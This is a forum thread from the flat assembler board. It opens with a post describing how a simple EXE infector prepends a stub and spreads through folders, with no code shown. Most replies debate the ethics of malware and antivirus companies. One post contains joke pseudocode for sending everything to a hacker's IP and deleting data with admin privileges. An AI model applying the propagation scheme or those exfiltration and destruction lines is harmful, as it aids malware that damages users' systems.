flat assembler
Message board for the users of flat assembler.
Index
> Tutorials and Examples > Rather easy EXE infector Goto page 1, 2, 3 Next |
Author |
|
typedef 25 Dec 2013, 06:53
A very simple way of infecting EXEs. Not practical but quite useful. All it does is append the original code to a stub, which will execute itself first then the original code. IMO I prefer entry point hijacking and and reconstructing the whole PE file. However, that method would not work on encrypted EXEs. This is where this method comes in.
There are different ways of executing the original code. In this example, I just duplicate the infected file and remove the stub and let the windows loader take care of the rest. The duped file is hidden in the same folder but can also be extracted to a different folder. The stub then waits for duplicated file and deletes it after its process terminates. A more effective way is to find EXEs in current directory, infect them then move up to parent folder and up to a specified depth. No error checking just straight up execution and no optimizations. Does not check if file is already infected. It will impregnate the file even more if infector.exe is ran multiple times.
|
|||||||||||||||||||||||||||||||
25 Dec 2013, 06:53 |
|
revolution 25 Dec 2013, 07:02
typedef wrote: Not practical but quite useful. |
|||
25 Dec 2013, 07:02 |
|
revolution 25 Dec 2013, 07:06
typedef wrote:
|
|||
25 Dec 2013, 07:06 |
|
typedef 25 Dec 2013, 07:10
revolution wrote:
rev Without malware you think AV companies will make a dime? |
|||
25 Dec 2013, 07:10 |
|
revolution 25 Dec 2013, 07:11
Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers.
So I guess you have no example that doesn't involve malware? |
|||
25 Dec 2013, 07:11 |
|
typedef 25 Dec 2013, 07:15
revolution wrote: Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers. Without broken computers there wouldn't be malware, and then there wouldn't be AV companies. And without Govt. backdoors and poor coding skills and hunger for money, there wouldn't be broken computers. |
|||
25 Dec 2013, 07:15 |
|
revolution 25 Dec 2013, 07:20
Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild.
|
|||
25 Dec 2013, 07:20 |
|
typedef 25 Dec 2013, 07:29
revolution wrote: Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild. But the people who rebuild the houses love to do so because they are hungry for money, and sometimes they'll burn down some houses themsevles just to be the ones to get hired to rebuild the houses. Wonder why AVs cook up stories about malware that no one has even heard of and force you to buy/upgrade their software. Hell, they even make their software deliberately "incompatible" with other security software so their malware don't get flagged by their competitors. Last edited by typedef on 25 Dec 2013, 07:45; edited 1 time in total |
|||
25 Dec 2013, 07:29 |
|
revolution 25 Dec 2013, 07:31
Indeed. I am no fan of AV companies either. It is not a perfect world we live in.
|
|||
25 Dec 2013, 07:31 |
|
HaHaAnonymous 25 Dec 2013, 13:38
[ Post removed by author. ]
Last edited by HaHaAnonymous on 28 Feb 2015, 18:54; edited 1 time in total |
|||
25 Dec 2013, 13:38 |
|
baldr 25 Dec 2013, 14:07
HaHaAnonymous,
They have to sell product (as insecure as it is), it has nothing to do with your expectations (about its stability/satisfaction/whatever). It works (up to some measure), then it can be sold. Nothing personal, just business. AV authors can (and probably would) intimidate regular users to use (and buy) their products, just as houseware manufacturers insist that their products will make our living safer. They both lie, in a way. It's about how long would you go to check it. |
|||
25 Dec 2013, 14:07 |
|
m3ntal 25 Dec 2013, 18:29
typedef: I'm sure you have some positive examples. How about a binary tree? Or a minimal Android example?
If an agency contacted me to create malware software, I'd refuse their business and tell them that it goes against my philosophy that software should be productive and not destructive to the user. Knowledge of LL concepts, machine code, executable formats, etc, can be used in a positive way; example: dynamic binary translator to/from X86+ARM. Just my thoughts. |
|||
25 Dec 2013, 18:29 |
|
Frank 29 Dec 2013, 14:38
Alright, after eleven off-topic responses, maybe someone should comment on the actual tutorial.
typedef, you have provided a generic EXE wrapper template. The code is written cleanly, it is easy to understand, and when I tried it briefly, it worked as expected (WIN7 Home Edition; no serious virus scanner installed). Insofar it is a very nice addition for the "Examples and Tutorials" section of this board. Congratulations! What needs a bit more work in the future is how you describe your contributions. By needlessly (and incorrectly!) framing your "EXE wrapper" as an "EXE infector" you achieved several things that you probably don't want: (a) you made yourself look like an attention-whoring 14-year old, (b) you invited the useless weirdo discussion about malware that you now got, rather than receiving useful feedback from competent people, and (c) people interested in EXE wrapping for legit purposes will ignore your tutorial because its context shouts "filth, smut, danger" loudly enough to make them not even look at the code. No congratulations on that. This feedback is genuinely meant to be useful to you. You're welcome. |
|||
29 Dec 2013, 14:38 |
|
HaHaAnonymous 29 Dec 2013, 17:01
[ Post removed by author. ]
Last edited by HaHaAnonymous on 28 Feb 2015, 18:41; edited 1 time in total |
|||
29 Dec 2013, 17:01 |
|
edfed 31 Dec 2013, 12:04
malwares are just like regular softwares with curious policies...
a machine is dumb (mov eax,ebx lea eax,[eax*5] etc...) it does what you tell it to do. a malware just involve the same instructions than regular softwares, but they are agenced in order to break the system... then, it is not the lazyness of system developper or whatever, but just the will of malware writers to make malwares. you can virtually write malwares for any programmable machine, from a heater regulator to a cray, but it is just malware. the goal of software is not to reproduce the genetically altered things we see in hospitals, but to make cooler and cooler stuff. maybe malware can bring some bricks to the future of computing, by highlighting some basic mechanisms of attacks and study some ways to avoid them... but there will always be malware writers, even for the more secure platform. then, what the goal of security? take 30%, 60%, 99% of the machine just to protect it??? ridiculous. the size of AV softwares is just a big insult to the freedom's and the efficiency's needs of this time. i don't believe malware are cool at all. first, it is a pure waste of time to create malwares, the creativeness of malware writer is poorly exploited. second, it is a pure waste of ressources, the machines running malwares will use energy and hardware to do that, and what it does is clearly useless. anybody can tell you that bill gates became what he is now by writing goodwares (not malwares). what he did was to make usefull OS and suites, used by billions peoples, and it is not cause it is microsoft, it is not also cause he was the son of somebody, but just cause he focused on creativity and usefullness of his products. of course, m$ is $hit, but a cool $hit, and i don't believe that anybody here never used a m$ product at least one time in his life... in fact, malwares are just the product of jealous peoples that consider windows as the shit of the century... in my opinion, the real shit is more a military product like kalashnikov, or a chemical like DDT, or something really dangerous... and that's the reason why bill gates became what he is now. he didn't created malwares and weapons, but just softwares used by the weapons designers. hem... bill gates is not a model to follow, but he is not the problem to fight. and writing malwares is always possible, even a fortress can be attacked. then, what do we need? computers or fortress? i need computer to do cool things, not fortress to hide behind with fear. and windows 98 is really cool cause now, it cannot longer browse the internet cause the new scripts norms are not supported then, win98 is just a pure machine, able to do stuff like they did before internet generalisation. for example, win98 supports very well the sockets and that is very cool to try networks designs and fuck malwares. for example, this kind of pseudocode: Code: invoke sendEverythingInbackGround,"theipofthehacker" invoke deleteEverythingInBackgroundWithAdminPrivilege |
|||
31 Dec 2013, 12:04 |
|
DOS386 01 Jan 2014, 09:03
revolution wrote: Creating malware is like burning down houses NO. Creating malware is like creating matches. But nowadays nobody needs malware (we got it already from M$), like nobody needs matches (we no longer heat using fire). So creating malware is useless but legal. Using malware to destroy other people's PC's is a crime. And creating matches is useless but legal. Using maches to burn down other people's houses is a crime. Further, nobody would have malware problems or need "AV" (= malware) if hardware and OS'es were designed properly. |
|||
01 Jan 2014, 09:03 |
|
HaHaAnonymous 01 Jan 2014, 14:12
[ Post removed by author. ]
Last edited by HaHaAnonymous on 28 Feb 2015, 18:40; edited 1 time in total |
|||
01 Jan 2014, 14:12 |
|
tthsqe 02 Jan 2014, 19:26
HaHaAnonymous, if what you are saying it true, are not AV companies themselves viruses on the computer market? I always thought of AV programs as viruses ever sense I reached the age of reason...
|
|||
02 Jan 2014, 19:26 |
|
HaHaAnonymous 02 Jan 2014, 23:44
[ Post removed by author. ]
Last edited by HaHaAnonymous on 28 Feb 2015, 18:40; edited 1 time in total |
|||
02 Jan 2014, 23:44 |
|
Goto page 1, 2, 3 Next < Last Thread | Next Thread > |
Forum Rules:
|
Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.
Website powered by rwasa.